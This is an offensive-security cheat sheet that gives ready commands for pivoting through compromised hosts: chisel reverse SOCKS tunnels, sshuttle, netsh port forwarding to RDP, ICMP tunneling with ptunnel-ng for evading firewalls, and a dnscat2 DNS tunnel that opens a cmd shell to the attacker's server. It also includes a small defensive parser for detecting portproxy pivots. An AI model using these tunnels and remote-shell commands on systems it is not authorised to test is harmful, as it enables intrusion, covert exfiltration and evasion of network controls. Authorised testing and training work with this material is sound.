More Techniques
There are times when the pivot host is a Windows system instead of Linux, so we need alternatives to SSH for port forwarding and tunneling. Sometimes we have only a reverse shell rather than a proper interactive shell; in those cases, statically linked binaries or other tricks become necessary.
This page provides a collection of tools and methods for port forwarding and tunneling during pivoting.
Techniques
chisel
# Quick Install the Binary
curl https://i.jpillora.com/chisel! | bash
# Copy to current directory to transfer anywhere else (linux)
cp /usr/local/bin/chisel ./chisel-binary
# .exe Binary
## https://github.com/jpillora/chisel/releases => the Releases section
## contains prebuilt binaries for many architectures and OSes.
# Build Binary From Source
git clone https://github.com/jpillora/chisel.git
cd chisel && go build
## Build Chisel Binary Compact (Reduces from 10M to 2.7M)
git clone https://github.com/jpillora/chisel.git
cd chisel && go build -ldflags="-s -w" -trimpath
upx --best --lzma chisel ## UPX Pack the binary
# Build Static Binary [Not Dynamically Linked]
git clone https://github.com/jpillora/chisel.git && cd chisel
CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build -a -ldflags '-extldflags "-static"'
### [[[---LINUX/WINDOWS---]]]
##### ------BIND------- #####
# From Pivot-Host
./chisel server -v -p 1337 --socks5 # NOTE THE "SOCKS5"
# From Attack-Host
./chisel client -v <PIVOT-HOST-IP>:1337 socks
##### ------REVERSE------- #####
# From Attack-Host
./chisel server --reverse -v -p 1337 --socks5
# From Pivot-Host
./chisel client -v <TUN0-OF-ATTACK-HOST>:1337 R:socks
./chisel client -v <TUN0-OF-ATTACK-HOST>:1337 R:127.0.0.1:8080:socks ## TO CHANGE PORT of SOCKS (default is 1080; --socks5 on the server takes no address)
## Note Add following in /etc/proxychains.conf
socks5 127.0.0.1 1080
# Access the target
proxychains firefox http://192.168.1.7:8080/
proxychains nmap -T4 192.168.1.7 -Pn
proxychains curl http://192.168.1.7:8080/
Info: Use proxychains4 -q nmap 192.168.1.7 to suppress the proxychains connection messages in the terminal output.
sshuttle
### [[[---LINUX---]]]
# Install using:
sudo apt-get install sshuttle
# From Attack Host:
sudo sshuttle -r rezydev@10.10.10.10 192.168.1.0/24 -v
# sshuttle only pivots over SSH, but it does not need proxychains:
# traffic to 192.168.1.0/24 is routed through the tunnel transparently
# Nmap/Curl
curl http://192.168.1.3
nmap -sCV 192.168.1.3 -vv -T4
Netsh.exe
### [[[---WINDOWS---]]]
netsh.exe interface portproxy add v4tov4 listenport=1337 listenaddress=10.10.10.10 connectport=3389 connectaddress=192.168.1.7
The command forwards traffic arriving on port 1337 of the pivot host (10.10.10.10) to port 3389 on 192.168.1.7 for RDP access.
To verify the configured rules:
netsh.exe interface portproxy show v4tov4
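From the defender's side, a portproxy rule that forwards to another host is a strong sign the machine is being used as a pivot. As an added example (not from this page's author), a small Python parser for the output of netsh interface portproxy show v4tov4 that flags rules not on an allow-list; the sample output and the allow-list are constructed.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed sample of `netsh.exe interface portproxy show v4tov4` output.
# The first rule is the one configured above (1337 -> RDP on 192.168.1.7).
SAMPLE_OUTPUT = """
Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
10.10.10.10     1337        192.168.1.7     3389
0.0.0.0         8080        127.0.0.1       8080
"""


@dataclass(frozen=True)
class PortProxyRule:
    listen_addr: str
    listen_port: int
    connect_addr: str
    connect_port: int

    def forwards_to_remote_host(self) -> bool:
        """True when traffic leaves the host, i.e. the rule acts as a pivot."""
        return not self.connect_addr.startswith("127.")


# A rule line: listen address (IPv4 or '*'), port, connect address, port.
# Header and separator lines do not start with an address, so they are skipped.
RULE_RE = re.compile(r"^\s*(\d{1,3}(?:\.\d{1,3}){3}|\*)\s+(\d+)\s+(\S+)\s+(\d+)\s*$")


def parse_portproxy(output: str) -> list[PortProxyRule]:
    """Extract the v4tov4 rules from netsh output."""
    rules = []
    for line in output.splitlines():
        m = RULE_RE.match(line)
        if m:
            rules.append(PortProxyRule(m.group(1), int(m.group(2)), m.group(3), int(m.group(4))))
    return rules


def suspicious_rules(rules: list[PortProxyRule], approved: set[PortProxyRule]) -> list[PortProxyRule]:
    """Return rules that are not on the allow-list, remote-forwarding ones first."""
    unknown = [r for r in rules if r not in approved]
    return sorted(unknown, key=lambda r: not r.forwards_to_remote_host())


if __name__ == "__main__":
    approved = {PortProxyRule("0.0.0.0", 8080, "127.0.0.1", 8080)}
    for r in suspicious_rules(parse_portproxy(SAMPLE_OUTPUT), approved):
        print("unexpected portproxy rule:", r, "pivot" if r.forwards_to_remote_host() else "local")
```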
ptunnel-ng
# ICMP tunneling hides traffic in ping requests and responses,
# enabling data exfiltration and external pivot tunnels when
# firewalls allow ping traffic.
# Link: https://github.com/utoni/ptunnel-ng
###----INSTALL----###
git clone https://github.com/utoni/ptunnel-ng.git
cd ptunnel-ng && sudo ./autogen.sh
# Target-Host
sudo ./ptunnel-ng -r<TARGET-HOST-IP> -R22
# Attack-Host
sudo ./ptunnel-ng -p<TARGET-HOST-IP> -l2222 -r<TARGET-HOST-IP> -R22
# local port 2222 now reaches port 22 on the target, carried inside ICMP echo traffic
DNS Tunneling (Dnscat2)
A PowerShell client for dnscat2 also exists, but that project is currently archived.
## Server (attack-host)
sudo ruby dnscat2.rb --dns host=<TUN0-IP>,port=53,domain=rezydev.local --no-cache
## Client (pivot-host)
Start-Dnscat2 -DNSserver 10.10.10.10 -Domain rezydev.local -PreSharedSecret <SECRET-PRINTED-BY-SERVER> -Exec cmd